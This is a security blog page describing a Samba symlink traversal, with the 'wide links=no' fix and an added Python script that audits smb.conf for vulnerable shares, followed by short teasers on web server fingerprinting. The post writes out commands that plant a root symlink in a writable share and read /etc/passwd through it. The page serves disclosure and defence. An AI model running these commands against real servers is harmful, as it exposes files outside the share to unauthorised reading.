M E T A E Y E SG

[ hunch ]

•  Watch out for writable samba shares.

I noticed a security issue with the default Samba configuration shipped with most Linux distributions.

For example, let's say we have a system A with a writable share XYZ. On another system B,
we mount the share and create a symbolic link to /, i.e. to the root directory.

[root@B] smbmount //A/XYZ /mnt/share -o username=test
Password:
[root@B] ln -s / /mnt/share/ROOT

Now we access the share with the smbclient tool:

[root@B] smbclient -U test //A/XYZ
Password:
Domain=[A] OS=[Unix] Server=[Samba 3.0.26a]
smb: \> ls ROOT/etc/passwd
passwd 879 Tue Sep 4 16:11:56 2007
37760 blocks of size 1048576. 9355 blocks available
smb: \>

As you can see, the whole file system of A is now reachable through the share: the attacker can
download every accessible file anywhere on A's file system, not just the files inside the share.

To prevent this, add the following directive to the [global] section of smb.conf:

wide links=no
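A defender will want to find such shares before someone else does. The following audit script is an added example, not code from the original post: it parses an smb.conf in the way smbd does (parameter names are case- and whitespace-insensitive, values like yes/no/1/0 are booleans) and reports every writable share whose effective "wide links" setting is not "no". The parameter names used (wide links, writable, writeable, write ok, read only, write list) are real Samba parameters; the sample configurations and the DEFAULT_WIDE_LINKS value, which models the older shipped default the post describes, are constructed assumptions.

```python
"""Audit an smb.conf for writable shares that still allow wide links.

Added example (not from the original post).  DEFAULT_WIDE_LINKS is an
assumption modelling the older distribution default the post describes.
"""
import configparser
import re

# Assumption: older default configurations left "wide links" enabled.
DEFAULT_WIDE_LINKS = True

_TRUE = {"yes", "true", "1", "on"}
_FALSE = {"no", "false", "0", "off"}


def _norm(name):
    """Samba ignores case and whitespace in parameter names ('WideLinks' == 'wide links')."""
    return re.sub(r"\s+", "", name).lower()


def _as_bool(value, default):
    """Parse a Samba boolean (yes/no, true/false, 1/0, on/off); None means 'not set'."""
    if value is None:
        return default
    v = value.strip().lower()
    if v in _TRUE:
        return True
    if v in _FALSE:
        return False
    raise ValueError("not a Samba boolean: %r" % value)


def parse_smb_conf(text):
    """Return {section: {normalised_param: value}} for an smb.conf string."""
    # smb.conf does not use indentation for continuation lines, so strip it;
    # otherwise configparser would treat indented lines as multi-line values.
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.RawConfigParser(   # Raw: no '%' interpolation, smb.conf uses %v, %U ...
        strict=False,                    # Samba tolerates repeated parameters and sections
        delimiters=("=",),
        comment_prefixes=("#", ";"),
        allow_no_value=True,
        empty_lines_in_values=False,
    )
    cp.optionxform = _norm               # normalise parameter names like smbd does
    cp.read_string(flat)
    return {s: dict(cp.items(s)) for s in cp.sections()}


def _is_writable(share):
    """True if clients can write to the share.

    'writable', 'writeable' and 'write ok' are synonyms; 'read only' is the
    inverse; a non-empty 'write list' grants write access on a read-only share.
    Samba's default is read only.
    """
    for key in ("writable", "writeable", "writeok"):
        if key in share:
            return _as_bool(share[key], False)
    if (share.get("writelist") or "").strip():
        return True
    if "readonly" in share:
        return not _as_bool(share["readonly"], True)
    return False


def audit_smb_conf(text):
    """Return (share, reason) tuples for writable shares where wide links are not disabled."""
    sections = parse_smb_conf(text)
    glob = sections.get("global", {})
    global_wide = _as_bool(glob.get("widelinks"), DEFAULT_WIDE_LINKS)
    findings = []
    for name, share in sections.items():
        if name == "global" or not _is_writable(share):
            continue
        # A share-level setting overrides [global]; otherwise inherit it.
        if _as_bool(share.get("widelinks"), global_wide):
            findings.append((name, "writable share with wide links enabled"))
    return findings


# Constructed sample in the style of the configuration the post describes.
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   server string = Samba %v

[XYZ]
   path = /srv/xyz
   writable = yes

[docs]
   path = /srv/docs
   read only = yes
"""

# The same configuration with the post's fix applied in [global].
FIXED_CONF = WEAK_CONF.replace("[global]", "[global]\n   wide links = no", 1)

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("fixed", FIXED_CONF)):
        print(label, audit_smb_conf(conf))
```

Run it against /etc/samba/smb.conf by reading the file into audit_smb_conf(); the weak sample above reports XYZ and the fixed one reports nothing. Later Samba releases changed the shipped default of "wide links" to no, so set DEFAULT_WIDE_LINKS to match the version you are auditing rather than trusting the assumption baked in here.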



•  Fingerprinting web servers with a %00.

%00 is the URL-encoded form of the famous null character. It is interesting to see how
differently web servers behave when a null character appears in the path of a GET request.

I use a simple Python program that takes a website name and a URL to fetch, and reports the
HTTP response code together with the web server version, if the response headers reveal one.

% ./uget.py
usage: ./uget.py <website name> <url>

continued…



•  Global.asa Story

It is interesting that global.asa has never caught the eye of penetration testers fingerprinting an IIS web server (I could not find any tool that checks for it).
continued…



•  Who’s Blocking

Generally, when nmap reports a host's ports as filtered, it is hard to
tell who blocked the probes, for example.
continued…



[ © MSG ]